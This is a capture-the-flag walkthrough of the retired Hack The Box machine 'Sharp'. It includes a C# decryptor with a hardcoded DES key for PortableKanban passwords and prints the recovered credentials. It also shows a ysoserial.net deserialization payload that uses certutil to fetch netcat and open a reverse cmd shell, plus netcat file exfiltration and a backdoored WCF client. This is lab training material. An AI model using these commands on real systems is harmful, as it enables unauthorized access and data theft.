This post documents the complete walkthrough of Sharp, a retired vulnerable VM created by cube0x0, and hosted at Hack The Box. If you are uncomfortable with spoilers, please stop reading now.

On this post

Background

Sharp is a retired vulnerable VM from Hack The Box.

Information Gathering

Let’s start with a masscan probe to establish the open ports in the host.

masscan -e tun0 -p1-65535,U:1-65535 10.10.10.219 --rate=500

Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2020-12-07 01:38:13 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 445/tcp on 10.10.10.219
Discovered open port 139/tcp on 10.10.10.219
Discovered open port 8889/tcp on 10.10.10.219
Discovered open port 8888/tcp on 10.10.10.219
Discovered open port 135/tcp on 10.10.10.219
Discovered open port 5985/tcp on 10.10.10.219

Sure looks like a Windows machine. Let’s do one better with nmap scanning the discovered ports to establish their services.

nmap -n -v -Pn -p135,139,445,5985,8888,8889 -A --reason 10.10.10.219 -oN nmap.txt
...
PORT     STATE SERVICE            REASON          VERSION
135/tcp  open  msrpc              syn-ack ttl 127 Microsoft Windows RPC
139/tcp  open  netbios-ssn        syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?      syn-ack ttl 127
5985/tcp open  http               syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
8888/tcp open  storagecraft-image syn-ack ttl 127 StorageCraft Image Manager
8889/tcp open  mc-nmf             syn-ack ttl 127 .NET Message Framing

Ports 8888/tcp and 8889/tcp sure look interesting. We’ll keep this in view first and revisit them later.

SMB Enumeration with smbmap

Since 445/tcp is available, let’s see what smbmap can offer.

smbmap -H 10.10.10.219 -R
[+] IP: 10.10.10.219:445        Name: 10.10.10.219                                      
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        dev                                                     NO ACCESS
        IPC$                                                    NO ACCESS       Remote IPC
        kanban                                                  READ ONLY
        .\kanban\*
        dr--r--r--                0 Sat Nov 14 18:57:04 2020    .
        dr--r--r--                0 Sat Nov 14 18:57:04 2020    ..
        fr--r--r--            58368 Sat Nov 14 18:57:04 2020    CommandLine.dll
        fr--r--r--           141312 Sat Nov 14 18:57:04 2020    CsvHelper.dll
        fr--r--r--           456704 Sat Nov 14 18:57:04 2020    DotNetZip.dll
        dr--r--r--                0 Sat Nov 14 18:57:59 2020    Files
        fr--r--r--            23040 Sat Nov 14 18:57:04 2020    Itenso.Rtf.Converter.Html.dll
        fr--r--r--            75776 Sat Nov 14 18:57:04 2020    Itenso.Rtf.Interpreter.dll
        fr--r--r--            32768 Sat Nov 14 18:57:04 2020    Itenso.Rtf.Parser.dll
        fr--r--r--            19968 Sat Nov 14 18:57:04 2020    Itenso.Sys.dll
        fr--r--r--           376832 Sat Nov 14 18:57:04 2020    MsgReader.dll
        fr--r--r--           133296 Sat Nov 14 18:57:04 2020    Ookii.Dialogs.dll
        fr--r--r--          2558011 Sat Nov 14 18:57:04 2020    pkb.zip
        dr--r--r--                0 Sat Nov 14 18:57:04 2020    Plugins
        fr--r--r--             5819 Sat Nov 14 18:57:04 2020    PortableKanban.cfg
        fr--r--r--           118184 Sat Nov 14 18:57:04 2020    PortableKanban.Data.dll
        fr--r--r--          1878440 Sat Nov 14 18:57:04 2020    PortableKanban.exe
        fr--r--r--            31144 Sat Nov 14 18:57:04 2020    PortableKanban.Extensions.dll
        fr--r--r--             2080 Sat Nov 14 18:57:04 2020    PortableKanban.pk3
        fr--r--r--             2080 Sat Nov 14 18:57:04 2020    PortableKanban.pk3.bak
        fr--r--r--               34 Sat Nov 14 18:57:04 2020    PortableKanban.pk3.md5
        fr--r--r--           413184 Sat Nov 14 18:57:04 2020    ServiceStack.Common.dll
        fr--r--r--           137216 Sat Nov 14 18:57:04 2020    ServiceStack.Interfaces.dll
        fr--r--r--           292352 Sat Nov 14 18:57:04 2020    ServiceStack.Redis.dll
        fr--r--r--           411648 Sat Nov 14 18:57:04 2020    ServiceStack.Text.dll
        fr--r--r--          1050092 Sat Nov 14 18:57:04 2020    User Guide.pdf
        .\kanban\Plugins\*
        dr--r--r--                0 Sat Nov 14 18:57:04 2020    .
        dr--r--r--                0 Sat Nov 14 18:57:04 2020    ..
        fr--r--r--            64424 Sat Nov 14 18:57:04 2020    PluginsLibrary.dll

We’d better download all of them to have a better look.

smbget -a -R smb://10.10.10.219/kanban
Using workgroup WORKGROUP, guest user
smb://10.10.10.219/kanban/CommandLine.dll
smb://10.10.10.219/kanban/CsvHelper.dll
smb://10.10.10.219/kanban/DotNetZip.dll
smb://10.10.10.219/kanban/Itenso.Rtf.Converter.Html.dll
smb://10.10.10.219/kanban/Itenso.Rtf.Interpreter.dll
smb://10.10.10.219/kanban/Itenso.Rtf.Parser.dll
smb://10.10.10.219/kanban/Itenso.Sys.dll
smb://10.10.10.219/kanban/MsgReader.dll
smb://10.10.10.219/kanban/Ookii.Dialogs.dll
smb://10.10.10.219/kanban/pkb.zip
smb://10.10.10.219/kanban/Plugins/PluginsLibrary.dll
smb://10.10.10.219/kanban/PortableKanban.cfg
smb://10.10.10.219/kanban/PortableKanban.Data.dll
smb://10.10.10.219/kanban/PortableKanban.exe
smb://10.10.10.219/kanban/PortableKanban.Extensions.dll
smb://10.10.10.219/kanban/PortableKanban.pk3
smb://10.10.10.219/kanban/PortableKanban.pk3.bak
smb://10.10.10.219/kanban/PortableKanban.pk3.md5
smb://10.10.10.219/kanban/ServiceStack.Common.dll
smb://10.10.10.219/kanban/ServiceStack.Interfaces.dll
smb://10.10.10.219/kanban/ServiceStack.Redis.dll
smb://10.10.10.219/kanban/ServiceStack.Text.dll
smb://10.10.10.219/kanban/User Guide.pdf
Downloaded 7.90MB in 7 seconds

Encrypted Passwords

I found the presence of two encrypted passwords in PortableKanban.pk3.bak, belonging to Administrator and lars respectively.

Decryption in Portable Kanban

Portable Kanban is developed in C# and the decryption function is found in PortableKanban.Data.dll.

Armed with this insight, it’s actually pretty easy to write a decryption program in Mono.

decrypt.cs
using System;
using System.IO;
using System.Security.Cryptography;
using System.Text;

public class Program
{
    private static byte[] iv  = Encoding.ASCII.GetBytes("XuVUm5fR");
    private static byte[] key = Encoding.ASCII.GetBytes("7ly6UznJ");

    public static void Main(string[] args)
    {
        string result;
        string cryptedString = args[0];

        DESCryptoServiceProvider des = new DESCryptoServiceProvider();
        result = new StreamReader(
                    new CryptoStream(
                        new MemoryStream(Convert.FromBase64String(cryptedString)),
                            des.CreateDecryptor(key, iv), CryptoStreamMode.Read)).ReadToEnd();

        Console.WriteLine(result);
    }
}

Compile decrypt.cs with mcs. This will produce decrypt.exe.

mcs decrypt.cs

And then run it with mono.

The backed-up password of Administrator is [email protected]$btRSHJYTarg.

The backed-up password of lars is G123HHrth234gRG.

More SMB Enumeration

Armed with a list of usernames and passwords, albeit a miserly two pairs, we can leverage on CrackMapExec to validate these credentials.

Bingo. Remember that there was another shared folder dev? Turns out that lars has read access.

smbmap -H 10.10.10.219 -u lars -p 'G123HHrth234gRG' -R
[+] IP: 10.10.10.219:445        Name: 10.10.10.219
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        dev                                                     READ ONLY
        .\dev\*
        dr--r--r--                0 Sun Nov 15 11:30:13 2020    .
        dr--r--r--                0 Sun Nov 15 11:30:13 2020    ..
        fr--r--r--             5632 Sun Nov 15 10:25:01 2020    Client.exe
        fr--r--r--               70 Sun Nov 15 13:59:02 2020    notes.txt
        fr--r--r--             4096 Sun Nov 15 10:25:01 2020    RemotingLibrary.dll
        fr--r--r--             6144 Mon Nov 16 11:55:44 2020    Server.exe
        IPC$                                                    READ ONLY       Remote IPC
        .\IPC$\*
        fr--r--r--                3 Mon Jan  1 00:00:00 1601    InitShutdown
        fr--r--r--                4 Mon Jan  1 00:00:00 1601    lsass
        fr--r--r--                3 Mon Jan  1 00:00:00 1601    ntsvcs
        fr--r--r--                3 Mon Jan  1 00:00:00 1601    scerpc
        fr--r--r--                1 Mon Jan  1 00:00:00 1601    Winsock2\CatalogChangeListener-364-0
        fr--r--r--                3 Mon Jan  1 00:00:00 1601    epmapper
        fr--r--r--                1 Mon Jan  1 00:00:00 1601    Winsock2\CatalogChangeListener-1e4-0
        fr--r--r--                3 Mon Jan  1 00:00:00 1601    LSM_API_service
        fr--r--r--                3 Mon Jan  1 00:00:00 1601    eventlog
        fr--r--r--                1 Mon Jan  1 00:00:00 1601    Winsock2\CatalogChangeListener-194-0
        fr--r--r--                3 Mon Jan  1 00:00:00 1601    atsvc
        fr--r--r--                4 Mon Jan  1 00:00:00 1601    wkssvc
        fr--r--r--                1 Mon Jan  1 00:00:00 1601    Winsock2\CatalogChangeListener-448-0
        fr--r--r--                3 Mon Jan  1 00:00:00 1601    W32TIME_ALT
        fr--r--r--                5 Mon Jan  1 00:00:00 1601    srvsvc
        fr--r--r--                1 Mon Jan  1 00:00:00 1601    vgauth-service
        fr--r--r--                1 Mon Jan  1 00:00:00 1601    Winsock2\CatalogChangeListener-268-0
        fr--r--r--                1 Mon Jan  1 00:00:00 1601    Winsock2\CatalogChangeListener-270-0
        fr--r--r--                1 Mon Jan  1 00:00:00 1601    PIPE_EVENTROOT\CIMV2SCM EVENT PROVIDER
        kanban                                                  NO ACCESS

Same thing. We’d better download all the files.

smbget -R -U'lars%G123HHrth234gRG' smb://10.10.10.219/dev
Using workgroup WORKGROUP, user lars
smb://10.10.10.219/dev/Client.exe
smb://10.10.10.219/dev/notes.txt
smb://10.10.10.219/dev/RemotingLibrary.dll
smb://10.10.10.219/dev/Server.exe
Downloaded 15.57kB in 0 seconds

I’ve a feeling we are going to see more .NET C# stuff in this one.

.NET Remoting Deserialization Vulnerability

Indeed. Check this out.

notes.txt
Todo:
    Migrate from .Net remoting to WCF
    Add input validation

If I had to guess, I would say this (.NET Remoting) is what’s behind port 8888/tcp.

Taking a leaf from James Forshaw’s excellent write-up on exploiting .NET Remoting, we can use his tool and ysoserial.net to gain a foothold.

Foothold

To do that, we need to switch over to a Windows environment, preferably COMMANDO VM, where we have a working copy of Visual Studio 2019 Community Edition because we need to build James Forshaw’s ExploitRemotingService.exe and ysoserial.net’s ysoserial.exe. The instruction to build them is beyong the scope of this write-up.

ysoserial.net payload

To generate the payload, use the following command. I’m using this nc64.exe. Obviously you need to host the executable with a HTTP server. I’m using Python3 http.server module.

ysoserial -f BinaryFormatter -o raw -g TypeConfuseDelegate -c "mkdir \temp && certutil -urlcache -split -f http://10.10.16.125/nc64.exe \temp\cute.exe && start \temp\cute.exe 10.10.16.125 1234 -e cmd.exe" > payload.bin

ExploitRemotingServer.exe

To send the payload over .NET Remoting, use James Forshaw’s ExploitRemotingService.exe.

ExploitRemotingService -s --ver=4 --nulluri --user="lars" --pass="G123HHrth234gRG" tcp://10.10.10.219:8888/SecretSharpDebugApplicationEndpoint raw payload.bin

We need to supply lars’ credentials as well.

Bingo, we have shell!

Getting user.txt

The file user.txt is at lars’ Desktop.

Privilege Escalation

During enumeration of lars’ account, I notice the presence of a folder wcf. It appears that lars have migrated the client-server architecture to Windows Communication Framework (WCF).

Exfiltrating the entire wcf folder

How are we going to do that?

Archiving the folder into a single file

Good thing there’s tar.exe in Windows 10 and later versions, we can tar the wcf folder and send it across to my analysis machine (COMMANDO VM) using netcat.

On my analysis machine

nc -lnvp 9999 > wcf.tar

From lars’ shell

Note: I’ve renamed nc64.exe to cute.exe in case you are wondering what’s cute.exe. :laughing:

cute 10.10.16.125 < wcf.tar

This is what’s in the wcf folder.

Windows Communication Foundation

Long story short, there’s a WcfServer.exe that’s listening on 8889/tcp in the remote machine. If I had to guess, I would say that it’s running with Administrator or NT AUTHORITY\SYSTEM privileges because there are no other users.

It has to be, right? Assuming I’m right, check out what the remote service contract has to offer.

Backdooring WcfClient.exe

Armed with that information, we can backdoor WcfClient.exe with InvokePowershell and call it a day.

Getting root.txt

Rebuild the solution and transfer WcfClient.exe and WcfRemotingLibrary.dll to C:\temp over at lars’ shell.

Note: I’ve renamed WcfClient.exe to sweet.exe in case you are wondering what’s sweet.exe. :laughing:

Download the backdoor’d WcfClient.exe from lars’ shell like so.

powershell -c iwr http://10.10.16.125/WcfClient.exe -outf .\sweet.exe

The end is here…

:dancer: